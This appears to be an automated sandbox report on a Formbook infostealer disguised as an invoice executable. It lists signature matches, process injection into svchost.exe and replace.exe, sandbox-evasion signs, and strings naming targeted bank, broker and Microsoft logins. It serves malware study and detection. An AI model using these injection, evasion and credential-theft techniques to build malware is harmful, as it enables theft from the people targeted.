Source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@7/4

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0044AF6C GetLastError,FormatMessageW,

0_2_0044AF6C

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,		0_2_004333BE
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,		0_2_00464EAE

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,

0_2_0045D619

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,

0_2_004755C4

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0047839D

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

0_2_0043305F

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

File created: C:\Users\user\AppData\Local\Temp\niellists

Source: Revised Invoice H000127896.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: replace.exe, 00000005.00000002.3291550327.000000000260E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2707246168.00000000025E3000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2707349833.0000000002604000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.0000000002604000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.000000000262F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Revised Invoice H000127896.exe

ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

File read: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Source: unknown	Process created: C:\Users\user\Desktop\Revised Invoice H000127896.exe "C:\Users\user\Desktop\Revised Invoice H000127896.exe"
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Revised Invoice H000127896.exe"
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
Source: C:\Windows\SysWOW64\replace.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Revised Invoice H000127896.exe"	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Windows\SysWOW64\replace.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Switches to a custom stack to bypass stack traces

Source: Revised Invoice H000127896.exe

Static file information: File size 1379361 > 1048576

Source:	Binary string: replace.pdb source: svchost.exe, 00000002.00000002.2532507526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490823870.000000000321A000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000002.3292070177.0000000000F38000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: replace.pdbGCTL source: svchost.exe, 00000002.00000002.2532507526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490823870.000000000321A000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000002.3292070177.0000000000F38000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MUjPkRkjOWKkX.exe, 00000004.00000000.2443952915.000000000080E000.00000002.00000001.01000000.00000005.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3291334317.000000000080E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: Revised Invoice H000127896.exe, 00000000.00000003.2068504373.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Revised Invoice H000127896.exe, 00000000.00000003.2068190374.0000000004660000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422918073.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420841777.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.000000000399E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2532709579.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002BDE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2534511525.000000000288D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Revised Invoice H000127896.exe, 00000000.00000003.2068504373.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Revised Invoice H000127896.exe, 00000000.00000003.2068190374.0000000004660000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2422918073.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420841777.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.000000000399E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000005.00000002.3292894877.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2532709579.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002BDE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2534511525.000000000288D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: replace.exe, 00000005.00000002.3293409108.000000000306C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.0000000002580000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000000.2598292163.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2821347362.0000000039BDC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: replace.exe, 00000005.00000002.3293409108.000000000306C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.0000000002580000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000000.2598292163.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2821347362.0000000039BDC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,

0_2_0040EBD0

Source: Revised Invoice H000127896.exe

Static PE information: real checksum: 0xa961f should be: 0x155d3a

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00416CB5 push ecx; ret	0_2_00416CC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418066 push ecx; rep ret	2_2_0041808F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414012 push es; iretd	2_2_00414075
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401A71 pushfd ; retf	2_2_00401ABE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004032C0 push eax; ret	2_2_004032C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004162CC pushad ; ret	2_2_004162CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417B73 push ecx; ret	2_2_00417B74
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417C09 pushfd ; retf	2_2_00417C0C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404D68 push es; retf	2_2_00404D6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413DC3 push edx; retf	2_2_00413DFD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414632 push es; iretd	2_2_00414633
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413E3A push edx; retf	2_2_00413DFD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00415723 push edx; ret	2_2_004157E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413FC9 push es; iretd	2_2_00414075
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413FC9 push FFFFFFB3h; retn E51Dh	2_2_004140F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404FCF push 001D5E1Fh; retf	2_2_00404FD4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401F9C push esp; ret	2_2_00401FAE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380225F pushad ; ret	2_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038027FA pushad ; ret	2_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx	2_2_038309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380283D push eax; iretd	2_2_03802858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03801368 push eax; iretd	2_2_03801369
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Code function: 4_2_03D4C340 push ecx; iretd	4_2_03D4C34E
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Code function: 4_2_03D5CAE7 pushfd ; retf	4_2_03D5CAEA
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Code function: 4_2_03D5CA51 push ecx; ret	4_2_03D5CA52
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Code function: 4_2_03D5B1AA pushad ; ret	4_2_03D5B1AB
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Code function: 4_2_03D5CF44 push ecx; rep ret	4_2_03D5CF6D
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Code function: 4_2_03D58F3F push es; iretd	4_2_03D58F53
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Code function: 4_2_03D5A6C5 push ebx; iretd	4_2_03D5A6C9
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Code function: 4_2_03D49EAD push 001D5E1Fh; retf	4_2_03D49EB2
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Code function: 4_2_03D5A601 push edx; ret	4_2_03D5A6C4

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_0047A330
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00434418

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	API/Special instruction interceptor: Address: 40A6EA4
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0387096E rdtsc

2_2_0387096E

Source: C:\Windows\SysWOW64\replace.exe	Window / User API: threadDelayed 4373			Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Window / User API: threadDelayed 5600			Jump to behavior

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-87573

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	API coverage: 3.7 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\replace.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\replace.exe TID: 3176	Thread sleep count: 4373 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 3176	Thread sleep time: -8746000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 3176	Thread sleep count: 5600 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 3176	Thread sleep time: -11200000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\replace.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\replace.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00452492
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00442886
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_004788BD
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_004339B6
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,	0_2_0045CAFA
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00431A86
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	0_2_0044BD27
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0045DE8F FindFirstFileW,FindClose,	0_2_0045DE8F
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0044BF8B
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_0213C240 FindFirstFileW,FindNextFileW,FindClose,	5_2_0213C240

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,

0_2_0040E500

Source: 59F79305l7.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 59F79305l7.5.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 59F79305l7.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 59F79305l7.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 59F79305l7.5.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 59F79305l7.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 59F79305l7.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 59F79305l7.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 59F79305l7.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 59F79305l7.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 59F79305l7.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 59F79305l7.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 59F79305l7.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 59F79305l7.5.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 59F79305l7.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: replace.exe, 00000005.00000002.3291550327.0000000002580000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2823180801.000001A539ABC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
